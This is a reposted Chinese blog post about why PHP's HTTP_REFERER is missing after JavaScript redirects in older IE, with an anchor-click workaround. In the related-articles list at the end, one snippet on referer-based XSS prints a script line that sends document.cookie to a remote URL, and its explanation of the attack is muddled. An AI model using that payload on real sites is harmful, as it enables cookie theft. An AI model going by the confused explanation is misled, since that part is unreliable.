ie下,php HTTP_REFERER获取失败的整理

最新推荐文章于 2021-03-22 19:14:50 发布
最新推荐文章于 2021-03-22 19:14:50 发布
阅读量197 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hongchenok/p/3884670.html
版权 
HTTP_REFERER有效的情况
1、以iframe 形式调用地址
2、以window.open调用,打开新页面window.open(url);
3、使用window.location.replace在Firefox 和Chrome下可以获取HTTP_REFERER
window.location.replace(url);
4、使用window.location.href在Firefox 和Chrome下可以获取HTTP_REFERER
window.location.href = url;
5、使用A标签跳转可以获取HTTP_REFERER

HTTP_REFERER无效的情况
1、使用函数 file_get_contents或file等函数调用URL地址,这个地址所在的文件无法获取HTTP_REFERER
2、使用window.location.replace在IE6、IE7、IE8下无法获取HTTP_REFERER
window.location.replace(url);
3、使用window.location.href在IE6、IE7、IE8下无法获取HTTP_REFERER
window.location.href = url;


解决方法,在ie下,js跳转使用如下方法:
1     function gotoUrl(url){
2         var gotoLink = document.createElement('a');
3 
4         gotoLink .href = url;
5 
6         document.body.appendChild(gotoLink);
7 
8         gotoLink .click();
9     }

完美解决~~

转载于:https://www.cnblogs.com/hongchenok/p/3884670.html

weixin_34279579
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpHTTP_REFERER函数用法实例
10-25
主要介绍了phpHTTP_REFERER函数用法,以实例的形式分别讲述了判断用户来路与伪造来路地址等应用,需要的朋友可以参考下
完美兼容各大浏览器获取HTTP_REFERER方法总结
09-04
在Web开发中,这个字段经常被用来分析用户流量来源、实施反爬虫策略或者进行安全验证。然而,不同的浏览器对...开发者应根据具体场景选择合适的方法,以确保在各种浏览器环境下都能获取到准确的HTTP_REFERER信息。
php $_server['http_referer'] 未定义,$ _SERVER ['HTTP_REFERER']丢失
weixin_39611037的博客
03-22 439
我想$_SERVER['HTTP_REFERER']在我的网站上使用,但得到以下信息:Notice: Undefined index: HTTP_REFERER我试过打印$_SERVER。输出以下内容:Array([HTTP_HOST] => 192.168.1.10[HTTP_USER_AGENT] => Mozilla/5.0 (X11; Ubuntu; Linux i686; r...
PHP $_SERVER['HTTP_REFERER'] 无效
little_spice的博客
05-12 3897
学到PHP的超级全局变量时,遇到了PHP $_SERVER['HTTP_REFERER'],不料在phpstorm中运行的到如下结果: <?php $x=5; $y=10; function addtion(){ $GLOBALS["z"]=$GLOBALS["x"]+$GLOBALS["y"];/** $GLOBALS 是PHP的一个超级全局变量组,在一个PHP脚本的全部作用...
php在服务器上 $_SERVER['HTTP_REFERER'] 出现Undefined index: HTTP_REFERER 解决方法
sebarsunny的专栏
10-09 1万+
<br />在文件头部加上“error_reporting(E_ERROR | E_WARNING | E_PARSE);”问题清除。O(∩_∩)O~
php使用referer,PHP中的$_SERVER["HTTP_REFERER"]用法浅谈
weixin_28025327的博客
03-09 808
大家知道$_SESSION['HTTP_REFERER']可以获取当前链接的上一个连接的来源地址,即链接到当前页面的前一页面的 URL 地址,可以做到防盗链作用,只有点击超链接(即) 打开的页面才有HTTP_REFERER环境变量, 其它如 window.open()、 window.location=...、window.showModelessDialog()等打开的窗口都没有HTTP_REF...
php的服务器变量$SERVER以及防止$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
铁柱的博客
06-04 3029
一、背景 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;突然想起来之前面试的一些面试题,让我写出几个服务器变量$SERVER代表的意思。。实话实说,这些东西已经忘记很久了,都是用的时候直接上网查,今天再复习复习吧。 二、$SERVER &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp
php 伪造HTTP_REFERER页面URL来源的三种方法
12-18
php获取当前页面的前一个页面URL地址,即当前页面是从哪个页面链接过来的,可以使用$_SERVER[‘HTTP_REFERER’],但是这个来源页面的URL地址是可以被伪造和欺骗的,本文章向大家介绍伪造HTTP_REFERER页面URL的三种...
自己的php网站没有referer,缺少php – $_SERVER [‘HTTP_REFERER’]
weixin_28285943的博客
03-18 493
我想在我的网站使用$ _SERVER [‘HTTP_REFERER’],但我得到以下:Notice: Undefined index: HTTP_REFERER我试过打印$ _SERVER。这将输出以下内容:Array([HTTP_HOST] => 192.168.1.10[HTTP_USER_AGENT] => Mozilla/5.0 (X11; Ubuntu; Linux i686...
PHP无法获取Referer问题排查
weixin_33841722的博客
08-20 544
测试结果: 同一个页面,2次打开,第一次能获取到Referer第二次获取不到,很好奇原因所在。 test1.php代码是: <?php echo '测试来源:直接载入页面<br/>'; echo '<a href="test_cookie.php">进入页面</a><br/>'; echo '测试来源:新...
HTTP_REFERER的用法及伪造
热门推荐
且行且吟
11-13 10万+
引言在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERERphp文档中的描述如下: “引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改 HTTP_REFERER 的功能。简言之,该值并不可信。 ” 在百度百科中,对于该参数的描
HTTP_REFERER有效和无效的情况
编程之路
02-24 6363
HTTP_REFERER有效和无效的情况 页面跳转服务器获取http头时,有时有 HTTP_REFERER,而有时又没有,下面整理了一些 http_referer 的使用注意情况: 【准备】 http://www.libaqiang.com下test.php文件 echo $_SERVER['HTTP_REFERER']; 【有效的情况】 1、以iframe 形式调用地址 2、以
$_SERVER['HTTP_REFERER'] 获取前一页面的 URL 地址注意事项
...
09-22 9307
直接访问$_SERVER["HTTP_REFERER"]会为空。使用tp跳转时有时为空. 我们习惯在用户登陆后跳转到登录前的页面,这是我们在login页面的隐藏域如 gotopage里面保存登陆前的url,使用:$_SERVER["HTTP_REFERER"]获取登陆前的url,但有时确获取不到值。 最终的解决办法是将当前页面的url存入session或者cookie,登陆成功后判断s
php获取页面来源 HTTP_REFERER
第7维度 - 日常笔记
03-11 8703
通过 getenv("HTTP_REFERER")  可以得到页面来源然后通过页面来源判断用户是不是用非法途径通过http来提交的数据
ie下跳转不带referer的解决方法
编程之路
02-24 4385
ie下跳转不带referer的解决方法 用js进行跳转,在ie下不能记录referer,但在ff下是可以的。 经过尝试,终于找到好的方法解决了。 呵呵!     最好的解决方法: var url="http://hi.baidu.com"; function goto2(){         if(document.all){                 document.writ
HTTP_REFERER获取失败
weixin_34413357的博客
06-04 794
ie下,php HTTP_REFERER获取失败整理HTTP_REFERER有效的情况 1、以iframe形式调用地址 2、以window.open调用,打开新页面window.open(url); 3、使用window.location.replace在Firefox和Chrome下可以获取HTTP_REFERER window.location.replace(ur...
HTTP_REFERER的xss
最新发布
10-13
HTTP_REFERER是HTTP协议中的一个请求头字段,用于标识请求来源页面的URL地址。在Web应用程序中,可以使用HTTP_REFERER来判断请求是否来自可信的来源页面,从而防止跨站点请求伪造(CSRF)攻击。但是,由于HTTP_REFERER可以被伪造,因此在某些情况下,攻击者可以利用HTTP_REFERER来进行XSS攻击。 具体来说,攻击者可以通过构造恶意页面,在其中注入一段JavaScript代码,并将该页面的URL地址设置为目标网站的URL地址。当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以利用HTTP_REFERER来执行XSS攻击。 例如,攻击者可以在恶意页面中注入以下代码: ```javascript <script> var img = new Image(); img.src = "http://www.target.com/submit?data=" + document.cookie; </script> ``` 当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以在目标网站上执行上述JavaScript代码,从而窃取用户的Cookie信息。 为了防止HTTP_REFERER的XSS攻击,Web应用程序可以采取以下措施: 1. 对HTTP_REFERER进行有效的过滤和验证,只允许来自可信的来源页面的请求通过; 2. 在HTTP响应头中设置Referrer-Policy,指定HTTP_REFERER的发送策略; 3. 在Web应用程序中使用CSRF Token等技术来防止CSRF攻击,从而减少HTTP_REFERER的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值